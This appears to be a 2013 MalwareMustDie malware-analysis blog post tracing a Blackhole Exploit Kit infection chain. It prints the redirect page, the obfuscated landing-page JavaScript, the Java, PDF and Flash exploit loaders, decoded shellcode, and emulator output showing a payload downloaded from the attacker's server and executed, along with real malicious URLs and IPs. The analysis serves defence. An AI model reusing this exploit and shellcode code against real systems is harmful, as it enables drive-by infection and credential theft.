A Guide to flush infectors & payload at BHEK Infection on dekamerionka.ru:8080 

Infection of Cridex Trojan dropping Fareit Credential Stealer 2013 Jan 14th

Virus Total:
[Payload] [Landing Page] [SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Exploit Infector Code Screenshot Pictures:
[SWF1] [SWF2] [PDF1] [PDF2] [JAR1] [JAR2/0day]

Sample Download--->>[MEDIAFIRE]

Guide & Log: (I'm sorry for using texts as report.. Lack of time)

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
=======================================================
#MalwareMustDie - Infection of Blackhole EK via Spam 
Landing page: dekamerionka.ru:8080
IP: 81.31.47.124, 91.224.135.20, 212.112.207.15
A guide to flush the Blackhole Payload & Infectors...
@unixfreaxjp /malware]$ date
Tue Jan 15 23:05:49 JST 2013
=======================================================
 
Infector urls...
 
h00p://ideawiz.org/letter.htm 
h00p://threesaints.org.uk/letter.htm 
h00p://masreptiles.terrarium.pl/letter.htm 
 
//All of the dirty stuff's download urls result:
 
PD-079  : h00p://dekamerionka.ru:8080/forum/links/column.php
jar     : h00p://dekamerionka.ru:8080/forum/links/column.php?cabimab=lij&ymwbck=rpe
payload : h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
swf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
swf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
pdf1    : h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
pdf2    : h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
 
//infector page access...
 
--20:26:45--  h00p://threesaints.org.uk/letter.htm
           => `letter.htm'
Resolving threesaints.org.uk... seconds 0.00, 173.254.28.107
Caching threesaints.org.uk => 173.254.28.107
Connecting to threesaints.org.uk|173.254.28.107|:80... seconds 0.00, connected.
  :
GET /letter.htm HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: threesaints.org.uk
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Date: Tue, 15 Jan 2013 11:26:45 GMT
Server: Apache
Last-Modified: Tue, 15 Jan 2013 11:14:17 GMT
ETag: "4f03efb-1a9-4d351dcda592d"
Accept-Ranges: bytes
Content-Length: 425
Vary: Accept-Encoding
Keep-Alive: timeout=10, max=30
Connection: Keep-Alive
Content-Type: text/html
  :
200 OK
Length: 425 [text/html]
"20:26:47 (11.89 MB/s) - letter.htm saved [425/425]"
 
 
// was having this codes...
 
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"
<title>Please wait</title>
 </head>
 <body>  
<h2><b>Please wait a moment ...  You will be forwarded. </h2></b>
<h5>Internet Explorer and Mozilla Firefox compatible only</h5><br>
 
<script>
var1=49;
var2=var1;
if(var1==var2) {document.location="h00p://dekamerionka.ru:8080/forum/links/column.php";}
</script>
 
</body>
</html>
 
-----------------------------------------------------------
"
// forward you to the landing page of BHEK....
"
--20:28:05--  h00p://dekamerionka.ru:8080/forum/links/column.php
           => `column.php
Resolving dekamerionka.ru... seconds 0.00, 81.31.47.124, 91.224.135.20, 212.112.207.15
Caching dekamerionka.ru => 81.31.47.124 91.224.135.20 212.112.207.15
Connecting to dekamerionka.ru|81.31.47.124|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 11:28:04 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
"20:28:07 (69.85 KB/s) - column.php saved [117566]"
A new obfuscation BHEK landing page..
first time to see this :

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<html><head><title></title></head><body>
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&y..
<param name="val" value="Dyy3OjjMeqV0el8toqV..
<param value="" name="prime"
<script>function c(){if(window.document)s+=String.fromCharCode(a..
var a = "!!8:97:!!4:32:80:!08:!!7:!03:!05:!!0:68:!0!:!!6:!0!:99:..
!6:!2!:!!2:!0!:!!!:!02:32:98:6!:6!:34:!02:!!7:!!0:99:!!6:!05:!!!..
98:4!:63:40:!00:46:!05:!!5:68:!0!:!02:!05:!!0:!0!:!00:40:99:4!:6..
3:!20:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:77:97:!!6:!04:46:!0..
:48:34:93:4!:59:!02:!!!:!!4:40:97:6!:48:59:97:60:52:59:97:43:43:..
:!!5:93:47:46:!!6:!0!:!!5:!!6:40:!00:9!:98:93:4!:4!:!23:!02:6!:!..
0:97:46:!08:!0!:!!0:!03:!!6:!04:59:!02:43:43:4!:!23:!09:6!:97:9!..
      :
...73:!!0:!02:!!!:46:!06:97:!!4:34:4!:59";
 
 
a=a.replace(/!/g,1)[sp](":");
for(i=0,s="";i<a.length;i++){
 c();
}
z=true;
try{document.createElement("span");}catch(q){z=false;}
if(window.document)if(z)e(s);
  </script></body></html>
Landing page structure:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
   :
// applet
<applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"
<param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
<param value="" name="prime" />
</applet>
 
   :
 
// first script
 function c()
 {
   if(window.document)s+=String.fromCharCode(a「i」);
 }
 e=eval;
 sp="split";
  
 
// soon followed by second script+obfuscation data:
var a = "!!8:97:!!4:32:80:!08:!!.....:97:!!4:34:4!:59";
 
// generator..
 a=a.replace(/!/g,1)[sp](":");
 for(i=0,s="";i<a.length;i++)
 {
   c();
 }
 z=true;
 try
 {
   document.createElement("span");
 }
 catch(q)
 {
   z=false;
 }
 if(window.document)if(z)e(s);
The summary of the infection method used in this landing page.

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// From this landing page we will get infections as follows:
 
"1. The HTML landing page applet will infect you with -
 
// - first infection of jar (it has the 0day java jar here..)"
    <applet code="hw" archive="/forum/links/column.php?cabimab=lij&ymwbck=rpe"
    <param name="val" value="Dyy3OjjMeqV0el8toqVwlKOrfrfj.tlK0j-8oqij%t-K0ow3D3xA.b1fO6oO68O68O11RtebhvO6qO60O1hO11O6qO6qO16O6CO6tRVb6.RAtboRqvb-"/>
    <param value="" name="prime" /></applet>
 
"2. The obfuscation landing page will infect you:
       
// flash/swf SWF1 exploit....."
   function getCN()
   { return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + 
     "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
 
"//pdf1"
   function p1(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);}
 
"//pdf2"
   function p2(){
   var d = document.createElement("object");
   d.setAttribute("data", "/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + x(pdfver.join(".")));
   d.setAttribute("type", "application/pdf");
   document.body.appendChild(d);
}
 
"//flash/swf SWF2 exploit...."
   function ff2(){
   var oSpan = document.createElement("span");
   var url = "/forum/links/column.php?jkmflr=" + x("c833f") + "&boqrjhrc=" + x("nyjy") +   "&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp";
   oSpan.innerHTML = "
    <object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
    <param name='movie' value='" + url + "' />
    <param name='allowScriptAccess' value='always' />
    <param name='Play' value='0' />
    <embed src='" + url + "' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
    </embed></object>
    ";
    document.body.appendChild(oSpan);  }
 
"// a shellcode (to be called by other exploitor as key of payload)"
   function getShellCode(){
   var a = "8200!%4482!%e551!%e034!%5164!%f474!...!%1414!%".split("").
   reverse().join("");
   return a["replace"](/\%!/g, "%" + "u")  }
 
"// and a jar component to detect your java version"
   $$["onDetec" + "tionDone"]("Ja" + "va", svwrbew6436b, "../data/getJavaInfo.jar");
Shellcode & Payload:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
"// change the code into below & see the result of the burped shellcode:"
 
var a = "8200!%4482!...!%1414!%".split("").reverse().join("");
var xxx=a["replace"](/\%!/g, "%" + "u");
document.write(xxx);
 
"// output :"
 
%u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uO9e9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad
%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d
%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd
%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d
%ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385
%uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278
%u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c
%uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef
%u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f
%u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842
%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28
%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2
%u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u4d4c%u4943%u4d45%u415a%u4647%u4943%u5aO6%u125d%u181O
%u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e4f%u1b15%u1218%u4619
%u1912%u1241%u4119%u1b12%uOe1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243
%u191b%u1912%u1242%u4719%u49Oe%u1915%uOe43%u474f%u4615%u43Oe%u155e%u2844%uOO28
 
--------------------------------------------------------------------------------
 
 
"// #Tips if you want to use libemu to crack this I made the below format for you.."
 
import pylibemu
  
shellcode  = b"\x41\x41\x41\x41\x83\x66\xfc\xe4\xeb\xfc\x58\x1O\xc9\x31\x81\x66\xO9\xe9\x8O\xfe\x28\x3O\xe2\x4O\xeb\xfa\xe8\xO5\xff\xeb"
shellcode += b"\xff\xff\xcc\xad\x1c\x5d\x77\xc1\xe8\x1b\xa3\x4c\x18\x68\x68\xa3\xa3\x24\x34\x58\xa3\x7e\x2O\x5e\xf3\x1b\xa3\x4e\x14\x76"
shellcode += b"\x5c\x2b\xO4\x1b\xc6\xa9\x38\x3d\xd7\xd7\xa3\x9O\x18\x68\x6e\xeb\x2e\x11\xd3\x5d\x1c\xaf\xad\xOc\x5d\xcc\xc1\x79\x64\xc3"
shellcode += b"\x7e\x79\x5d\xa3\xa3\x14\x1d\x5c\x2b\x5O\x7e\xdd\x5e\xa3\x2b\xO8\x1b\xdd\x61\xe1\xd4\x69\x2b\x85\x1b\xed\x27\xf3\x38\x96"
shellcode += b"\xda\x1O\x2O\x5c\xe3\xe9\x2b\x25\x68\xf2\xd9\xc3\x37\x13\xce\x5d\xa3\x76\xOc\x76\xf5\x2b\xa3\x4e\x63\x24\x6e\xa5\xd7\xc4"
shellcode += b"\xOc\x7c\xa3\x24\x2b\xfO\xa3\xf5\xa3\x2c\xed\x2b\x76\x83\xeb\x71\x7b\xc3\xa3\x85\xO8\x4O\x55\xa8\x1b\x24\x2b\x5c\xc3\xbe"
shellcode += b"\xa3\xdb\x2O\x4O\xdf\xa3\x2d\x42\xcO\x71\xd7\xbO\xd7\xd7\xd1\xca\x28\xcO\x28\x28\x7O\x28\x42\x78\x4O\x68\x28\xd7\x28\x28"
shellcode += b"\xab\x78\x31\xe8\x7d\x78\xc4\xa3\x76\xa3\xab\x38\x2d\xeb\xcb\xd7\x47\x4O\x28\x46\x4O\x28\x5a\x5d\x45\x44\xd7\x7c\xab\x3e"
shellcode += b"\x2O\xec\xcO\xa3\x49\xcO\xd7\xd7\xc3\xd7\xc3\x2a\xa9\x5a\x2c\xc4\x28\x29\xa5\x28\xOc\x74\xef\x24\xOc\x2c\x4d\x5a\x5b\x4f"
shellcode += b"\x6c\xef\x2c\xOc\x5a\x5e\x1a\x1b\x6c\xef\x2O\xOc\xO5\xO8\xO8\x5b\x4O\x7b\x28\xdO\x28\x28\x7e\xd7\xa3\x24\x1b\xcO\x79\xe1"
shellcode += b"\x6c\xef\x28\x35\x58\x5f\x5c\x4a\x6c\xef\x2d\x35\x4c\xO6\x44\x44\x6c\xee\x21\x35\x71\x28\xe9\xa2\x18\x2c\x6c\xaO\x2c\x35"
shellcode += b"\x79\x69\x28\x42\x28\x42\x7f\x7b\x28\x42\x7e\xd7\xad\x3c\x5d\xe8\x42\x3e\x7b\x28\x7e\xd7\x42\x2c\xab\x28\x24\xc3\xd7\x7b"
shellcode += b"\x2c\x7e\xeb\xab\xc3\x24\xc3\x2a\x6f\x3b\x17\xa8\x5d\x28\x6f\xd2\x17\xa8\x5d\x28\x42\xec\x42\x28\xd7\xd6\x2O\x7e\xb4\xcO"
shellcode += b"\xd7\xd6\xa6\xd7\x26\x66\xbO\xc4\xa2\xd6\xa1\x26\x29\x47\x1b\x95\xa2\xe2\x33\x73\x6e\xee\x1e\x51\xO7\x32\x4O\x58\x5c\x5c"
shellcode += b"\x12\x58\xO7\xO7\x4d\x4c\x49\x43\x4d\x45\x41\x5a\x46\x47\x49\x43\x5a\xO6\x12\x5d\x18\x1O\x18\x1O\x4e\xO7\x5a\x47\x45\x5d"
shellcode += b"\x44\xO7\x46\x41\x5b\x43\x4b\xO7\x44\x47\x45\x5d\xO6\x46\x4O\x58\x17\x58\x4e\x4f\x1b\x15\x12\x18\x46\x19\x19\x12\x12\x41"
shellcode += b"\x41\x19\x1b\x12\xOe\x1b\x4d\x47\x1a\x15\x12\x5e\x43\x19\x19\x12\x12\x45\x1a\x1b\x1b\x12\x12\x1b\x43\x19\x19\x12\x12\x43"
shellcode += b"\x19\x1b\x19\x12\x12\x42\x47\x19\x49\xOe\x19\x15\xOe\x43\x47\x4f\x46\x15\x43\xOe\x15\x5e\x28\x44\xOO\x28"
  
emulator = pylibemu.Emulator()
offset = emulator.shellcode_getpc_test(shellcode)
offset
  
emulator.prepare(shellcode, offset)
emulator.test()
print emulator.emu_profile_output
"
----------------------------------------------------------------------------
// my way is...
// sav the binary and disassembly it..
----------------------------------------------------------------------------"
41 41 41 41 66 83 e4 fc  fc eb 1O 58 31 c9 66 81   AAAAf......X1.f.
e9 O9 fe 8O 3O 28 4O e2  fa eb O5 e8 eb ff ff ff   ....O(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3   ..]..w..L.h..h$.
58 34 7e a3 5e 2O 1b f3  4e a3 76 14 2b 5c 1b O4   X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 9O a3  68 18 eb 6e 11 2e 5d d3   ..=8....h..n..].
af 1c Oc ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3   .....]y..dy~.]..
5c 1d 5O 2b dd 7e a3 5e  O8 2b dd 1b e1 61 69 d4   \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  1O da 5c 2O e9 e3 25 2b   .+.....8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 Oc 2b f5 4e a3   .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c Oc  24 a3 fO 2b f5 a3 2c a3   $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 4O O8 a8 55 24 1b   +..vq..{..@..U$.
5c 2b be c3 db a3 4O 2O  a3 df 42 2d 71 cO bO d7   \+....@...B-q...
d7 d7 ca d1 cO 28 28 28  28 7O 78 42 68 4O d7 28   .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d   ((x..1x}...v8..-
d7 cb 4O 47 46 28 28 4O  5d 5a 44 45 7c d7 3e ab   ..@GF((@]ZDE|.>.
ec 2O a3 cO cO 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c   .....I....*.Z..,
29 28 28 a5 74 Oc 24 ef  2c Oc 5a 4d 4f 5b ef 6c   )((.t.$.,.ZMO[.l
Oc 2c 5e 5a 1b 1a ef 6c  Oc 2O O8 O5 5b O8 7b 4O   .,^Z...l....[.{@
dO 28 28 28 d7 7e 24 a3  cO 1b e1 79 ef 6c 35 28   .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  O6 4c 44 44 ee 6c 35 21   _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 aO 6c  35 2c 69 79 42 28 42 28   (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e   {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3   ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42   ;o..(].o..(].B(B
d6 d7 7e 2O cO b4 d6 d7  d7 a6 66 26 c4 bO d6 a2   ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 O7   &.G)....s3.nQ.2.
58 4O 5c 5c 58 12 O7 O7  4c 4d 43 49 45 4d 5a 41   X@\\X...LMCIEMZA
47 46 43 49 O6 5a 5d 12  1O 18 1O 18 O7 4e 47 5a   GFCI.Z]......NGZ
5d 45 O7 44 41 46 43 5b  O7 4b 47 44 5d 45 46 O6   ]E.DAFC[.KGD]EF.
58 4O 58 17 4f 4e 15 1b  18 12 19 46 12 19 41 12   X@X.ON.....F..A.
19 41 12 1b 1b Oe 47 4d  15 1a 5e 12 19 43 12 19   .A....GM..^..C..
45 12 1b 1a 12 1b 1b 12  19 43 12 19 43 12 1b 19   E........C..C...
12 19 42 12 19 47 Oe 49  15 19 43 Oe 4f 47 15 46   ..B..G.I..C.OG.F
Oe 43 5e 15 44 28 28 OO                            .C^.D((.        
 
 
-------------------------------------------------------------------"
 
// see the payload url below in the 0x1a494bbe at urlmon? ↓                                  "
 
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
                                                                                                    "
//payload is here..                                                                           "
h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
                                                                                               "
//download...                                                                           "
 
--21:33:38--  h00p://dekamerionka.ru:8080/forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l
           => `column.php@gf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&a=1k&go=n&kv=l
Resolving dekamerionka.ru... seconds 0.00, 212.112.207.15, 81.31.47.124, 91.224.135.20
Caching dekamerionka.ru => 212.112.207.15 81.31.47.124 91.224.135.20
Connecting to dekamerionka.ru|212.112.207.15|:8080... seconds 0.00, connected.
  :                                                                                               "
GET /forum/links/column.php?gf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&a=1k&go=n&kv=l HTTP/1.0                                                                                        "
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
  :
HTTP request sent, awaiting response...
  : 
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:33:36 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Tue, 15 Jan 2013 12:33:37 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private                                                              "
Content-Disposition: attachment; filename=calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 140288
200 OK                                                                                    "
Length: 140,288 (137K) [application/x-msdownload]
100%[====================================>] 140,288       64.83K/s
21:33:42 (64.73 KB/s) - `calc.exe' saved [140288/140288]                "
Getting infector components

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
    :
// let's get the SWF1...
// I prefer to check the obfuscated link in below function:
 
function getCN(){
  return "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + 
  "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy" }
 
// it is using function x, so let's use it too to decode values of url string..
 
function x(s){
  d = [];
  for (i = 0; i < s.length; i ++ ){
    k = (s.charCodeAt(i)).toString(33);
    d.push(k);}  ;  return d.join(":");}
var xxx= "/forum/links/column.php?cphwe=" + x("c833f") + "&tgou=" + x("kqddo") + "&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy";
document.write(xxx);
 
// result:
/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
 
//download it...
h00p://dekamerionka.ru:8080/forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy
GET /forum/links/column.php?cphwe=30:1n:1i:1i:33&tgou=38:3e:31:31:3c&emubvku=2v:1k:1m:32:33:1k:1k:31:1j:1o&zjxsiyt=kxy HTTP/1.0
User-Agent: MalwareMustDie Rocks Blackhole Again!
Host: dekamerionka.ru:8080
Connection: Keep-Alive
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:50:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 7238
200 OK
Registered socket 1896 for persistent reuse.
Length: 7,238 (7.1K) [text/html]
100%[====================================>] 7,238         22.73K/s
 
// Get the SWF2 Infector,..
 
// same method...
h00p://dekamerionka.ru:8080/forum/links/column.php?jkmflr=30:1n:1i:1i:33&boqrjhrc=3b:3m:37:3m&rshcr=2v:1k:1m:32:33:1k:1k:31:1j:1o&jfwxwr=gcp
 
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 12:51:12 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
Content-Length: 946
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 946 [text/html]
100%[====================================>] 946           --.--K/s
21:51:14 (26.47 MB/s) - "column.php@jkmflr=30%3A1n%3A1i%3A1i%3A33&boqrjhrc=3b%3A3m%3A37%3A3m&rshcr=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&jfwxwr=gcp" saved [946/946]
 
 
// Get the PDF 1 & 2 infectors..., w/ understanding value of  x(pdfver.join("."))= "1k:1d:1f:1d:1g:1d:1f"
 
/forum/links/column.php?cdaa=" + x("c833f") + "&nzhwe=" + x(  "wvv") + "&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=" + "1k:1d:1f:1d:1g:1d:1f"
/forum/links/column.php?yjjdw=" + x("c833f") + "&wjqofll=" + x(  "o") + "&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=" + "1k:1d:1f:1d:1g:1d:1f"
   
h00p://dekamerionka.ru:8080/forum/links/column.php?cdaa=30:1n:1i:1i:33&nzhwe=3k:3j:3j&feocz=2v:1k:1m:32:33:1k:1k:31:1j:1o&tyq=1k:1d:1f:1d:1g:1d:1f
h00p://dekamerionka.ru:8080/forum/links/column.php?yjjdw=30:1n:1i:1i:33&wjqofll=3c&hqxcfgl=2v:1k:1m:32:33:1k:1k:31:1j:1o&ncd=1k:1d:1f:1d:1g:1d:1f
 
// shortly, the download logs..
 
     :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 15 Jan 2013 13:05:17 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 21575
ETag: "18f8a6bcd64232c6eeead1d0a2c5cd62"
Last-Modified: Tue, 15 Jan 2013 13:05:17 GMT
Accept-Ranges: bytes
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,575 (21K) [application/pdf]
100%[====================================>] 21,575        40.09K/s
   :
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
